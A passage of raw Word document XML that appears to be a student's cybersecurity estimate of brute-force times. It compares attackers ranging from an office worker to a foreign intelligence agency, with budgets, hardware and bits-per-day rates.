                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>2.79322 x</w:t>
                  </w:r>
                  <w:r w:rsidR="00E05570">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>10^</w:t>
                  </w:r>
                  <w:r w:rsidR="00AA46C9">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>16</w:t>
                  </w:r>
                  <w:r w:rsidR="00E05570">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> days </w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EB538C" w:rsidRPr="00903D82" w14:paraId="38FA2DDF" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="616"/>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5A9FE978"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lastRenderedPageBreak/>
                    <w:t>Professional bitcoin miner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3CC84B3" w14:textId="0E580B32"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F042BF">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>$500M</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6DA4B8A" w14:textId="429A91A9" w:rsidR="00831FB7" w:rsidRDefault="00831FB7" w:rsidP="00831FB7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>(</w:t>
                  </w:r>
                  <w:r w:rsidR="00EB538C" w:rsidRPr="00831FB7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00831FB7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>Bitmain</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r w:rsidRPr="00831FB7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00831FB7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>Antminer</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00831FB7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> S21 XP 270TH/s</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>) x 5000</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6F230D41" w14:textId="1B05C16E" w:rsidR="00831FB7" w:rsidRPr="00831FB7" w:rsidRDefault="00831FB7" w:rsidP="00831FB7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00831FB7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="180B9448" w14:textId="2EC0582C" w:rsidR="00EB538C" w:rsidRPr="00831FB7" w:rsidRDefault="00EB538C" w:rsidP="00EB538C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                  </w:pP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0F444C0D" w14:textId="5AAD5A71"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831FB7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>1.1664x10^23 bits per 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A26438C" w14:textId="0E4AAF28" w:rsidR="00B9480E"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B9480E">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve">2.91737x10^15 days </w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EB538C" w:rsidRPr="00903D82" w14:paraId="4FB4219C" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="616"/>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0BE9FF2"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Foreign Intelligence Agency</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5C0B023F" w14:textId="0B563C9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98788C">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>$2</w:t>
                  </w:r>
                  <w:r w:rsidR="00F042BF">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>B</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2D620421" w14:textId="49A16F42" w:rsidR="00EB538C" w:rsidRPr="00903D82" w:rsidRDefault="00E003A3"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2 x 2 exaflop supercomputing facilities</w:t>
                  </w:r>
                  <w:r w:rsidR="00EB538C" w:rsidRPr="00903D82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t> </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24452647" w14:textId="0A4FA05E"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E003A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>3.456x10^23 bits/day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518FD75" w14:textId="77777777" w:rsidR="00E003A3" w:rsidRDefault="00E003A3"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9.846133 x 10^14 days</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0BDA45CB" w14:textId="622E375E" w:rsidR="00EB538C" w:rsidRPr="00903D82" w:rsidRDefault="00EB538C" w:rsidP="00EB538C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="34B45DA2" w14:textId="3CB4E1B3" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="00903D82">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2082"/>
              </w:tabs>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29A2013A" w14:textId="119056F5" w:rsidR="181B8E52" w:rsidRDefault="00903D82" w:rsidP="181B8E52">
            <w:r>
              <w:t xml:space="preserve">Note: N bits of work </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>requires</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserv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bit decisions that need to be completed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32B655B6" w14:textId="1944AA9A" w:rsidR="00AC1CEF" w:rsidRDefault="00AC1CEF" w:rsidP="00AC1CEF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Asumming</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> after the office worker that the solo teenage hacker and above </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>are able to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> make one bit decision per clock cycle.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="045CE5FC" w14:textId="383D9D3F" w:rsidR="00CA4D29" w:rsidRDefault="00CA4D29" w:rsidP="00AC1CEF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Assuming brute forcing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64F5FB6A" w14:textId="77777777" w:rsidR="00652DFD" w:rsidRDefault="00652DFD" w:rsidP="00652DFD">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71BA496D" w14:textId="3145B917" w:rsidR="00652DFD" w:rsidRPr="00ED5F6D" w:rsidRDefault="00652DFD" w:rsidP="00652DFD">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Calculation can be made for time as </w:t>
            </w:r>
            <m:oMath>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                </w:rPr>
                <m:t xml:space="preserve">days= </m:t>
              </m:r>
              <m:f>
                <m:fPr>
                  <m:ctrlPr>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math"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N</m:t>
                      </m:r>
                    </m:sup>
                  </m:sSup>
                </m:num>
                <m:den>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                    </w:rPr>
                    <m:t>rate(bits/day)</m:t>
                  </m:r>
                </m:den>
              </m:f>
            </m:oMath>
          </w:p>
          <w:p w14:paraId="68C29C7F" w14:textId="56CF32E1" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="240FD2B7" w14:textId="6C70ECBF" w:rsidR="007C100A" w:rsidRDefault="007C100A" w:rsidP="181B8E52">
            <w:r>
              <w:t>Handy Site:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A3AEA36" w14:textId="026BAFCA" w:rsidR="007C100A" w:rsidRDefault="007C100A" w:rsidP="181B8E52">
            <w:hyperlink r:id="rId18" w:anchor="date" w:history="1">
              <w:r w:rsidRPr="00676B32">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://www.cpubenchmark.net/laptop.html#date</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BBCA2CB" w14:textId="77777777" w:rsidR="007C100A" w:rsidRPr="00ED5F6D" w:rsidRDefault="007C100A" w:rsidP="181B8E52"/>
          <w:p w14:paraId="4B18F8D1" w14:textId="5B938FEE" w:rsidR="181B8E52" w:rsidRPr="004458A6" w:rsidRDefault="004458A6" w:rsidP="181B8E52">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004458A6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Office Worker:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68CBD2E9" w14:textId="21D49E7E" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="005B73AE" w:rsidP="004458A6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Most Common CPU according to is the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Ryzen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 5: </w:t>
            </w:r>
            <w:hyperlink r:id="rId19" w:anchor="cpu-commonality" w:history="1">
              <w:r w:rsidRPr="00676B32">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://www.cpubenchmark.net/common_cpus.html#cpu-commonality</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41AE5F47" w14:textId="2A2874F1" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="11B66F3E" w14:textId="029C6F0C" w:rsidR="005B73AE" w:rsidRDefault="005B73AE" w:rsidP="005B73AE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Whilst the office worker has more CPU power, they are being supervised so will be mostly limited by their own time constraints: Hence they are only capable of making 1 decision every 10 minutes. Hence, 51 per 24 Hours.</w:t>
            </w:r>
            <w:r w:rsidR="00426E56">
              <w:t xml:space="preserve"> Assuming they work 8 and a half our days</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ED64B28" w14:textId="77777777" w:rsidR="005B73AE" w:rsidRDefault="005B73AE" w:rsidP="005B73AE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="327D3F5F" w14:textId="77777777" w:rsidR="005B73AE" w:rsidRDefault="005B73AE" w:rsidP="005B73AE">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B73AE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Solo Teenage Hacker:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="330E8282" w14:textId="77777777" w:rsidR="00163D99" w:rsidRPr="00163D99" w:rsidRDefault="003A4F61" w:rsidP="003A4F61">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>I am assuming that this person will spend approximately 75%</w:t>
            </w:r>
            <w:r w:rsidR="004D16C5">
              <w:t xml:space="preserve"> ($7.5k)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> of their available funds on the PC equipment. And then the remaining will be on training, skills development and tools. </w:t>
            </w:r>
            <w:r w:rsidR="005656F6">
              <w:t xml:space="preserve"> I am assuming by this they will have th</w:t>
            </w:r>
            <w:r w:rsidR="00163D99">
              <w:t xml:space="preserve">e </w:t>
            </w:r>
            <w:r w:rsidR="005656F6">
              <w:t>computer mostly dedicated or almost full utilisation</w:t>
            </w:r>
            <w:r w:rsidR="00163D99">
              <w:t xml:space="preserve"> and under the assumption they are only using a </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00163D99">
              <w:t>nominal computer elements</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00163D99">
              <w:t xml:space="preserve"> such as a GPU and/or CPU but not HPC grade components.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70723FD5" w14:textId="77777777" w:rsidR="005B73AE" w:rsidRPr="00717063" w:rsidRDefault="00163D99" w:rsidP="003A4F61">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00717063">
              <w:t xml:space="preserve">Get something </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00717063">
              <w:t>similar to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00717063">
              <w:t xml:space="preserve"> a </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00717063">
              <w:t>pretty well</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00717063">
              <w:t xml:space="preserve"> upgraded Lenovo P3 Tower- But doesn’t know how to use GPU but can make it multithreaded</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C6B792B" w14:textId="7CB10629" w:rsidR="00EB538C" w:rsidRPr="00EB538C" w:rsidRDefault="00EB538C" w:rsidP="00EB538C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <m:oMath>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                </w:rPr>
                <m:t>24threads×5.7GHz×24</m:t>
              </m:r>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                </w:rPr>
                <m:t>hours≈</m:t>
              </m:r>
              <m:f>
                <m:fPr>
                  <m:ctrlPr>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:i/>
                    </w:rPr>
                  </m:ctrlPr>
                </m:fPr>
                <m:num>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                    </w:rPr>
                    <m:t>1.181952×</m:t>
                  </m:r>
                  <m:sSup>
                    <m:sSupPr>
                      <m:ctrlPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                          <w:i/>
                        </w:rPr>
                      </m:ctrlPr>
                    </m:sSupPr>
                    <m:e>
                      <m:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                        </w:rPr>
                        <m:t>10</m:t>
                      </m:r>
                    </m:e>
                    <m:sup>
                      <m:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                        </w:rPr>
                        <m:t>16</m:t>
                      </m:r>
                    </m:sup>
                  </m:sSup>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                    </w:rPr>
                    <m:t>bits</m:t>
                  </m:r>
                </m:num>
                <m:den>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                    </w:rPr>
                    <m:t>day</m:t>
                  </m:r>
                </m:den>
              </m:f>
            </m:oMath>
          </w:p>
          <w:p w14:paraId="742B561C" w14:textId="77777777" w:rsidR="00EB538C" w:rsidRDefault="003317F4" w:rsidP="00EB538C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003317F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Small Business Hacking</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F60E685" w14:textId="77777777" w:rsidR="003317F4" w:rsidRDefault="000B00DE" w:rsidP="00473801">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="000B00DE">
              <w:lastRenderedPageBreak/>
              <w:t>Assuming</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> this business has the resources for 10 people/PCs to simultaneously run through the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>processes</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and they are all equivalent to a Lenovo workstation and then </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>have to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> utilise the 100K for the compute and the infrastructure costs of their network. They will be able to achieve 10 times more.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="519E7431" w14:textId="709DFD88" w:rsidR="000B00DE" w:rsidRDefault="000B00DE" w:rsidP="000B00DE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Hence:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="516FFCE4" w14:textId="6F9DC6F2" w:rsidR="006576AD" w:rsidRDefault="00000000" w:rsidP="00DE490B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
            </w:pPr>
            <m:oMathPara>
              <m:oMath>
                <m:f>
                  <m:fPr>
                    <m:ctrlPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                        <w:i/>
                      </w:rPr>
                    </m:ctrlPr>
                  </m:fPr>
                  <m:num>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>1.181952×</m:t>
                    </m:r>
                    <m:sSup>
                      <m:sSupPr>
                        <m:ctrlPr>
                          <w:rPr>
                            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                            <w:i/>
                          </w:rPr>
                        </m:ctrlPr>
                      </m:sSupPr>
                      <m:e>
                        <m:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                          </w:rPr>
                          <m:t>10</m:t>
                        </m:r>
                      </m:e>
                      <m:sup>
                        <m:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                          </w:rPr>
                          <m:t>16</m:t>
                        </m:r>
                      </m:sup>
                    </m:sSup>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>bits</m:t>
                    </m:r>
                  </m:num>
                  <m:den>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>day</m:t>
                    </m:r>
                  </m:den>
                </m:f>
                <m:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  </w:rPr>
                  <m:t>×10≈</m:t>
                </m:r>
                <m:f>
                  <m:fPr>
                    <m:ctrlPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                        <w:i/>
                      </w:rPr>
                    </m:ctrlPr>
                  </m:fPr>
                  <m:num>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>1.181952×</m:t>
                    </m:r>
                    <m:sSup>
                      <m:sSupPr>
                        <m:ctrlPr>
                          <w:rPr>
                            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                            <w:i/>
                          </w:rPr>
                        </m:ctrlPr>
                      </m:sSupPr>
                      <m:e>
                        <m:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                          </w:rPr>
                          <m:t>10</m:t>
                        </m:r>
                      </m:e>
                      <m:sup>
                        <m:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                          </w:rPr>
                          <m:t>1</m:t>
                        </m:r>
                        <m:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                          </w:rPr>
                          <m:t>7</m:t>
                        </m:r>
                      </m:sup>
                    </m:sSup>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>bits</m:t>
                    </m:r>
                  </m:num>
                  <m:den>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>day</m:t>
                    </m:r>
                  </m:den>
                </m:f>
              </m:oMath>
            </m:oMathPara>
          </w:p>
          <w:p w14:paraId="72EB9F6C" w14:textId="77777777" w:rsidR="006576AD" w:rsidRDefault="006576AD" w:rsidP="006576AD">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006576AD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">Large Organisation </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006576AD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Hacking :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0C3B7F08" w14:textId="77777777" w:rsidR="006576AD" w:rsidRDefault="006576AD" w:rsidP="006576AD">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> A large organisation will likely implement a HPC with that budget in a server rack form</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FEF9105" w14:textId="77777777" w:rsidR="006576AD" w:rsidRDefault="006576AD" w:rsidP="008A7E74">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
